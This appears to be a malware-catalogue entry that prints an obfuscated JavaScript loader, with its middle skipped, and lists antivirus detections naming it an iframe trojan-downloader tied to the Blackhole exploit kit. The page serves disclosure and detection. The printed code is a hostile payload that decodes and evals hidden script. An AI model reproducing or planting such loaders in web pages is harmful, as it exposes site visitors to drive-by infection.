Malicious code - confirmed by antiviruses (see below) heti=String;scnf="spl"+"i"+"t";yxnptd=window;hus=(1)?"0x":"123";wloidl=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(idnv){yry=false;try{}catch(qry){yry=21;}if(1){pwzl="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq66Zq60Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq66Zq60Zq17Zq3
... 4870 bytes are skipped ...q6bZq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq66Zq60Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[scnf]("Zq");}yxnptd=pwzl;uyvd=[];for(rhs=22-20-2;-rhs+1393!=0;rhs+=1){bbu=rhs;if((0x19==031))uyvd+=heti.fromCharCode(eval(hus+yxnptd[1*bbu])+0xa-wloidl);}tcwqs=eval;if(Math.ceil(5.5)===6)tcwqs(uyvd)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|